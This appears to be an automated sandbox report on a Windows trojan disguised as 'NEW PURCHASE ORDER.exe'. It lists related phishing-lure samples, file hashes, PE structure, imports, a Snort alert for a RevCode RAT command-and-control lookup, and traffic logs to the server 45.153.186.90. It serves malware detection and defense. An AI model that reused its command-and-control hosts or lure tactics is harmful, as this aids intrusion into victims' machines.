	REQUEST FOR QUOTATION.exe	Get hash	malicious	Browse	45.153.186.90
	FILE_2932NH_9923.exe	Get hash	malicious	Browse	45.153.186.90
	d6N339EMPr.exe	Get hash	malicious	Browse	45.153.186.187
	DHL_PACKAGE_HD98232.pdf.exe	Get hash	malicious	Browse	45.153.186.90
	BANK DETAILS.pdf.exe	Get hash	malicious	Browse	45.153.186.90
	OFfcxY5xia.exe	Get hash	malicious	Browse	45.153.186.90
	1FysgNhnWC.exe	Get hash	malicious	Browse	2.56.212.39
	BFfrxGDQx7.exe	Get hash	malicious	Browse	2.56.212.39
	UnuiloxBcq.exe	Get hash	malicious	Browse	2.56.212.39
	Z2YNNlDA9o.exe	Get hash	malicious	Browse	45.153.186.90
	o7w2HSi17V.exe	Get hash	malicious	Browse	178.157.82.127
	MATCH_OUTSTANDING_BILL.exe	Get hash	malicious	Browse	45.153.186.90
	85ASXq9rnd.exe	Get hash	malicious	Browse	2.56.213.5
	lc3of5dOat.exe	Get hash	malicious	Browse	45.153.186.90
	Sysdiagnostic.exe	Get hash	malicious	Browse	178.157.91.42
	ONS-2_exe.exe	Get hash	malicious	Browse	93.115.21.128
	mvJMfkrri8.exe	Get hash	malicious	Browse	93.115.21.128
	1p037oXV3S.exe	Get hash	malicious	Browse	93.115.21.128

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	uWNsC4gTOM.exe	Get hash	malicious	Browse	45.153.186.90
	Pay.html	Get hash	malicious	Browse	45.153.186.90
	oI5cZirXM4.dll	Get hash	malicious	Browse	45.153.186.90
	9P8Hhc1WwU.xls	Get hash	malicious	Browse	45.153.186.90
	Charge_F1K6_2021.08.11.xlsm	Get hash	malicious	Browse	45.153.186.90
	LP7_inv_2021.08.11.xlsm	Get hash	malicious	Browse	45.153.186.90
	SecuriteInfo.com.ArtemisE8C492551DB9.27618.exe	Get hash	malicious	Browse	45.153.186.90
	Craig_Wynnresorts.htm	Get hash	malicious	Browse	45.153.186.90
	Yeni Siparis listesi.exe	Get hash	malicious	Browse	45.153.186.90
	#Ud83d#Udcde Globalfoundries.com AudioMessage_24-75553.htm	Get hash	malicious	Browse	45.153.186.90
	COMPANY PROFILE AND PURCHASE ORDER.exe	Get hash	malicious	Browse	45.153.186.90
	JXB TRANS_2021.08.09.xlsb	Get hash	malicious	Browse	45.153.186.90
	DHV3EMAIsu.exe	Get hash	malicious	Browse	45.153.186.90
	ATT86868.HTM	Get hash	malicious	Browse	45.153.186.90
	vi5pioH5Fx.exe	Get hash	malicious	Browse	45.153.186.90
	Project Proposal and Analysis.html	Get hash	malicious	Browse	45.153.186.90
	Hymix Quotation 17671 & Invoices.html	Get hash	malicious	Browse	45.153.186.90
	Pedido de cotacao 11-08-2021#U00b7pdf.exe	Get hash	malicious	Browse	45.153.186.90
	kbdindev.exe	Get hash	malicious	Browse	45.153.186.90
	SWIFT PLA#U0106ANJE.exe	Get hash	malicious	Browse	45.153.186.90

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Users\user\Desktop\NEW PURCHASE ORDER.exe
File Type:	Microsoft Cabinet archive data, 61020 bytes, 1 file
Category:	dropped
Size (bytes):	61020
Entropy (8bit):	7.994886945086499
Encrypted:	true
SSDEEP:	1536:IZ/FdeYPeFusuQszEfL0/NfXfdl5lNQbGxO4EBJE:0tdeYPiuWAVtlLBGm
MD5:	2902DE11E30DCC620B184E3BB0F0C1CB
SHA1:	5D11D14A2558801A2688DC2D6DFAD39AC294F222
SHA-256:	E6A7F1F8810E46A736E80EE5AC6187690F28F4D5D35D130D410E20084B2C1544
SHA-512:	EFD415CDE25B827AC2A7CA4D6486CE3A43CDCC1C31D3A94FD7944681AA3E83A4966625BF2E6770581C4B59D05E35FF9318D9ADADDADE9070F131076892AF2FA0
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF....\.......,...................I........l.........R.q .authroot.stl.N....5..CK..8T....c_.d....A.K....=.D.eWI..r."Y...."i..,.=.l.D.....3...3WW.......y...9..w..D.yM10....`.0.e.._.'..a0xN....)F.C..t.z.,.O20.1``L.....m?H..C..X>Oc..q.....%.!^v%<...O...-..@/.......H.J.W...... T...Fp..2.\|$....._Y..Y`&..s.1........s.{..,.":o}9.......%._.xWS.K..4"9......q.G:.........a.H.y.. ..r...q./6.p.;.`=.Dwj......!......s).B..y.......A.!W.........D!s0..!"X...l.....D0...........Ba...Z.0.o..l.3.v..W1F hSp.S)@.....'Z..QW...G...G.G.y+.x...aa`.3..X&4E..N...._O..<X.......K...xm..+M...O.H...)............o..~4.6.......p.`Bt.(..V.N.!.p.C>..%.ySXY.>.`..f\|....'^K`\..e......j/..\|..)..&i...wEj.w...o..r<.$.....C.....}.x...L..&..).r..\...>....v........7...^..L!.$..'m...,.....7F$..~..S.6$S.-y....\|.!.....x...~k...Q/.w.e...h.[...9<x...Q.x.][}_%Z..K.).3..'....M.6QkJ.N........Y..Q.n.[.(.... ...Bg..33..[...S..[... .Z..<i.-.]...po.k.,...X6......y3^.t[.Dw.]ts. R..L..`..ut_F....

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Users\user\Desktop\NEW PURCHASE ORDER.exe
File Type:	data
Category:	dropped
Size (bytes):	326
Entropy (8bit):	3.139205445116623
Encrypted:	false
SSDEEP:	6:kKdidoW+N+SkQlPlEGYRMY9z+4KlDA3RUeIlD1Ut:Ve5kPlE99SNxAhUe0et
MD5:	38A6DA5775821983A9C49E1C5217C7E9
SHA1:	C2EED952F6D6513F4B596C0A7941D2137981CEAB
SHA-256:	0C8A15EFB51500E9307888C2833626B712D1E2DE0DD481F02BCAE4B3DC8A718D
SHA-512:	83DB156E0415E26A377DA81DDAFAB7E69B35004020AB27DCEBAC2C08C1168FB5E635944293A0C50A3CFDD4FB65FFC7329A1839756A03943203A4B7BC0BBBF54A
Malicious:	false
Reputation:	low
Preview:	p...... ............(....................................................... .........T'._......$...........\...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.6.5.4.2.7.7.5.f.d.7.1.:.0."...

C:\Users\user\Desktop\d70d27bc.bin Download File
Process:	C:\Users\user\Desktop\NEW PURCHASE ORDER.exe
File Type:	HTML document, ASCII text, with no line terminators
Category:	modified
Size (bytes):	111
Entropy (8bit):	5.209113925390233
Encrypted:	false
SSDEEP:	3:iQGorVPo3XngJrBN9Tf2BOlfuRJlcn:iQTo3kBNxkH/c
MD5:	BF8FCABD2BCEE0A0A9649CBB48DDB786
SHA1:	E08022E69122FB92F6A1C06C13B5BAE5181A9FF0
SHA-256:	5AA57C56EB604D89ABBA4D3BE3DC44C3B8C5CD1395E6C1D3AEADDF669419ADA0
SHA-512:	F08422851E36CDFB76F922FD7A997604227CE4CE49335011CD9F55A867DDB0879BDE9BB06FFEC956883EC4441F61DC1574FBC59892A98F4F337916B749D3D3C5
Malicious:	false
Reputation:	low
Preview:	<block><date>UcHRqo0UrhZlkdwrI7FIyRo4GwJ9c2BW3MvqSter3QU=</date><title>2RMKbJKZl+oziWM6WsLIKw==</title></block>

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.972454109100089
TrID:	Win32 Executable (generic) a (10002005/4) 99.83% Windows Screen Saver (13104/52) 0.13% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	NEW PURCHASE ORDER.exe
File size:	1006049
MD5:	bcb77b64ef4a369f8b381aff4c6f1c57
SHA1:	4624958cd8a724ad01868331d9a78a64fb0cdcb0
SHA256:	142cf7f01ff7c99da5e16196325e3fa3a6d867ff0e50696d727c92696ba97ccf
SHA512:	9249aea1d4a0d467c544271297ee7b88851c586c9afab522f845a071d7551bbefdfc49b516d13bb5d31277ab194026ecd5852e0d751b0527e7543a2d9607405a
SSDEEP:	24576:kkirwmPnCRldoDbhC8xyhFOKOl0TWfNBBx6xs30LM:kxrwmPnCS/TxAFOX+TYwxk0LM
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........r].l...l...l...s...l..hp...l...s...l.......l...l..il.......l.......l...l...l.......l..Rich.l..................PE..L...g1.a...

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x401000
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x61133167 [Wed Aug 11 02:09:43 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	48cf05311e4a3e8be7b754cbebbc2209

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 004067B0h
push 00405D0Ah
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [004060B4h]
pop ecx
or dword ptr [004099C8h], FFFFFFFFh
or dword ptr [004099CCh], FFFFFFFFh
call dword ptr [004060B8h]
mov ecx, dword ptr [004099BCh]
mov dword ptr [eax], ecx
call dword ptr [004060BCh]
mov ecx, dword ptr [004099B8h]
mov dword ptr [eax], ecx
mov eax, dword ptr [004060C0h]
mov eax, dword ptr [eax]
mov dword ptr [004099D0h], eax
call 00007F2D88FEC2D9h
cmp dword ptr [00408020h], ebx
jne 00007F2D88FEC1DEh
push 00401170h
call dword ptr [004060C4h]
pop ecx
call 00007F2D88FEC2ABh
push 0040800Ch
push 00408008h
call 00007F2D88FF0E2Ah
mov eax, dword ptr [004099B4h]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [004099B0h]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [004060CCh]
push 00408004h
push 00408000h
call 00007F2D88FF0DF7h

Rich Headers

Programming Language:

[ C ] VS98 (6.0) build 8168
[LNK] VS98 (6.0) imp/exp build 8168

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6924	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x67bc	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x6000	0x228	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4d28	0x4e00	False	0.551181891026	data	6.05535290939	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x6000	0x144c	0x1600	False	0.494140625	data	5.08472723238	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x8000	0x19d4	0x200	False	0.044921875	data	0.0572566022412	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xa000	0x1e0	0x200	False	0.529296875	data	4.70150325825	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_MANIFEST	0xa060	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
COMCTL32.dll	InitCommonControlsEx, CreateToolbarEx, CreateStatusWindowW, PropertySheetW
KERNEL32.dll	GetLocalTime, VirtualProtect, GetModuleHandleW, LoadLibraryW, HeapFree, lstrcmpW, lstrcmpiW, lstrcpynW, lstrcpyW, lstrcatW, lstrlenW, GetDateFormatW, GetTimeFormatW, GetModuleHandleA, HeapReAlloc, HeapAlloc, GetLastError, CloseHandle, WriteFile, SetFilePointer, GetProcessHeap, ReadFile, CreateFileW, GetCommandLineW, MulDiv, GetStartupInfoA
USER32.dll	InvalidateRect, SetWindowTextA, SetWindowTextW, GetWindowTextA, GetWindowTextW, GetWindowTextLengthW, GetClientRect, GetWindowRect, MessageBoxA, MessageBoxW, MessageBoxIndirectW, ClientToScreen, MapWindowPoints, GetSysColorBrush, IntersectRect, IsRectEmpty, GetWindowLongW, ReleaseDC, LoadCursorW, LoadIconW, LoadImageW, IsDialogMessageW, MonitorFromRect, GetMonitorInfoW, TrackPopupMenu, PostQuitMessage, DefWindowProcW, PostMessageW, SendMessageW, PeekMessageW, DispatchMessageW, TranslateMessage, GetMessageW, RegisterWindowMessageW, wsprintfW, LoadStringW, GetDC, RegisterClassExW, GrayStringW, SetMenuItemInfoW, TrackPopupMenuEx, GetSubMenu, EnableMenuItem, CheckMenuItem, SetMenu, GetMenu, LoadMenuW, GetSystemMetrics, TranslateAcceleratorW, LoadAcceleratorsW, EnableWindow, SetFocus, IsDlgButtonChecked, CheckRadioButton, CheckDlgButton, GetDlgItem, EndDialog, DialogBoxParamW, IsWindowVisible, MoveWindow, GetMenuItemInfoW, ShowWindow, SetWindowLongW, CreateWindowExW, SetActiveWindow
GDI32.dll	GetDeviceCaps, SelectObject, GetTextExtentPointW, EnumFontFamiliesExW
COMDLG32.dll	ChooseFontW, ReplaceTextW, GetSaveFileNameW, GetOpenFileNameW, FindTextW
SHELL32.dll	DragAcceptFiles, DragFinish, DragQueryFileW, ShellAboutW
MSVCRT.dll	_controlfp, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, memset, memcpy, isspace, atoi, wcstod, qsort, _errno, _onexit, __dllonexit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
08/12/21-07:45:48.571052	ICMP	399	ICMP Destination Unreachable Host Unreachable			185.242.229.94	192.168.2.3
08/12/21-07:45:51.770995	ICMP	399	ICMP Destination Unreachable Host Unreachable			185.242.229.94	192.168.2.3
08/12/21-07:45:51.771025	ICMP	399	ICMP Destination Unreachable Host Unreachable			185.242.229.94	192.168.2.3
08/12/21-07:45:54.938793	ICMP	399	ICMP Destination Unreachable Host Unreachable			185.242.229.94	192.168.2.3
08/12/21-07:45:58.139034	ICMP	399	ICMP Destination Unreachable Host Unreachable			185.242.229.94	192.168.2.3
08/12/21-07:46:01.274931	ICMP	399	ICMP Destination Unreachable Host Unreachable			185.242.229.94	192.168.2.3
08/12/21-07:46:04.541348	ICMP	399	ICMP Destination Unreachable Host Unreachable			185.242.229.94	192.168.2.3
08/12/21-07:46:04.541378	ICMP	399	ICMP Destination Unreachable Host Unreachable			185.242.229.94	192.168.2.3
08/12/21-07:46:07.738719	ICMP	399	ICMP Destination Unreachable Host Unreachable			185.242.229.94	192.168.2.3
08/12/21-07:46:10.875041	ICMP	399	ICMP Destination Unreachable Host Unreachable			185.242.229.94	192.168.2.3
08/12/21-07:46:14.522947	ICMP	399	ICMP Destination Unreachable Host Unreachable			185.242.229.94	192.168.2.3
08/12/21-07:46:14.522984	ICMP	399	ICMP Destination Unreachable Host Unreachable			185.242.229.94	192.168.2.3
08/12/21-07:46:17.850930	ICMP	399	ICMP Destination Unreachable Host Unreachable			185.242.229.94	192.168.2.3
08/12/21-07:46:17.850992	ICMP	399	ICMP Destination Unreachable Host Unreachable			185.242.229.94	192.168.2.3
08/12/21-07:46:24.442777	ICMP	399	ICMP Destination Unreachable Host Unreachable			185.242.229.94	192.168.2.3
08/12/21-07:46:44.412720	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.3	114.114.114.114
08/12/21-07:46:44.833943	UDP	2032361	ET TROJAN WebMonitor/RevCode RAT CnC Domain in DNS Lookup	58784	53	192.168.2.3	8.8.8.8
08/12/21-07:46:45.594380	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.3	114.114.114.114
08/12/21-07:46:47.215880	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.3	114.114.114.114

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 12, 2021 07:46:44.938858986 CEST	49740	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:45.047439098 CEST	443	49740	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:45.047554016 CEST	49740	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:45.073388100 CEST	49740	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:45.169012070 CEST	443	49740	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:45.327744007 CEST	443	49740	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:45.327771902 CEST	443	49740	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:45.327933073 CEST	49740	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:46.443609953 CEST	49740	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:46.576736927 CEST	443	49740	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:46.597486973 CEST	443	49740	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:46.598949909 CEST	49740	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:46.601571083 CEST	49740	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:46.824040890 CEST	443	49740	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:47.147715092 CEST	443	49740	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:47.147999048 CEST	49740	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:47.317656040 CEST	49742	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:47.513199091 CEST	443	49742	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:47.514691114 CEST	49742	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:47.515310049 CEST	49742	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:47.700179100 CEST	443	49742	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:47.750941038 CEST	443	49742	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:47.751189947 CEST	49742	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:47.751928091 CEST	49742	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:47.758492947 CEST	49742	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:47.809222937 CEST	443	49742	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:47.810158014 CEST	443	49742	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:48.139694929 CEST	443	49742	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:48.141717911 CEST	49742	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:48.150115967 CEST	49740	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:48.151865005 CEST	49743	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:48.329737902 CEST	443	49743	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:48.329921961 CEST	49743	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:48.330888987 CEST	49743	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:48.332227945 CEST	443	49740	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:48.332479000 CEST	49740	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:48.532871962 CEST	443	49743	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:48.539289951 CEST	443	49743	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:48.539458036 CEST	49743	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:48.540323973 CEST	49743	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:48.551580906 CEST	49743	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:48.764075994 CEST	443	49743	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:49.163382053 CEST	443	49743	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:49.163572073 CEST	49743	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:49.167593002 CEST	49742	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:49.168059111 CEST	49743	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:49.171407938 CEST	49744	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:49.171895981 CEST	49745	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:49.228444099 CEST	443	49744	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:49.228614092 CEST	49744	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:49.229721069 CEST	49744	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:49.232657909 CEST	443	49745	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:49.232832909 CEST	49745	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:49.233767986 CEST	49745	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:49.247488976 CEST	443	49742	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:49.247649908 CEST	49742	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:49.248331070 CEST	443	49743	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:49.248430967 CEST	49743	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:49.305439949 CEST	443	49744	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:49.307318926 CEST	443	49745	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:49.671602964 CEST	443	49744	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:49.671854019 CEST	49744	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:49.672600031 CEST	49744	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:49.673844099 CEST	443	49745	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:49.674129009 CEST	49745	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:49.675328970 CEST	49745	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:49.683172941 CEST	49744	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:49.684505939 CEST	49745	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:49.736893892 CEST	443	49744	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:49.761050940 CEST	443	49745	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:49.792351007 CEST	443	49744	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:49.792387962 CEST	443	49745	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:50.189949036 CEST	443	49745	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:50.190330982 CEST	49745	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:50.219161987 CEST	443	49744	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:50.219382048 CEST	49744	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:51.180020094 CEST	49745	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:51.182957888 CEST	49746	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:51.371210098 CEST	443	49746	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:51.371534109 CEST	49746	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:51.372559071 CEST	443	49745	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:51.372632027 CEST	49746	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:51.372718096 CEST	49745	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:51.547349930 CEST	443	49746	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:51.564827919 CEST	443	49746	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:51.565069914 CEST	49746	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:51.565929890 CEST	49746	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:51.576019049 CEST	49746	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:51.672517061 CEST	443	49746	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:52.239187002 CEST	443	49746	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:52.239523888 CEST	49746	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:54.258608103 CEST	49744	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:54.261828899 CEST	49747	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:54.396647930 CEST	443	49747	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:54.396817923 CEST	49747	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:54.398113012 CEST	49747	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:54.430990934 CEST	443	49744	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:54.431180000 CEST	49744	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:54.454646111 CEST	443	49747	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:54.674038887 CEST	443	49747	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:54.674460888 CEST	49747	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:54.675066948 CEST	49747	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:54.682940960 CEST	49747	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:54.726552963 CEST	443	49747	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:54.760251045 CEST	443	49747	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:55.473016977 CEST	443	49747	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:55.473087072 CEST	49747	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:57.477260113 CEST	49746	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:57.480663061 CEST	49748	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:57.531572104 CEST	443	49748	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:57.531801939 CEST	49748	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:57.532951117 CEST	49748	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:57.543378115 CEST	443	49746	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:57.543617964 CEST	49746	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:57.585357904 CEST	443	49748	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:57.847603083 CEST	443	49748	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:57.849035978 CEST	49748	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:57.849864960 CEST	49748	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:57.856942892 CEST	49748	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:46:57.930702925 CEST	443	49748	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:57.958563089 CEST	443	49748	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:58.442042112 CEST	443	49748	45.153.186.90	192.168.2.3
Aug 12, 2021 07:46:58.442236900 CEST	49748	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:00.447479963 CEST	49747	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:00.450706005 CEST	49749	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:00.495480061 CEST	443	49749	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:00.495723963 CEST	49749	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:00.497102022 CEST	49749	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:00.524935007 CEST	443	49747	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:00.525037050 CEST	49747	443	192.168.2.3	45.153.186.90
Aug 12, 2021 07:47:00.617314100 CEST	443	49749	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:00.857431889 CEST	443	49749	45.153.186.90	192.168.2.3
Aug 12, 2021 07:47:00.857601881 CEST	49749	443	192.168.2.3	45.153.186.90
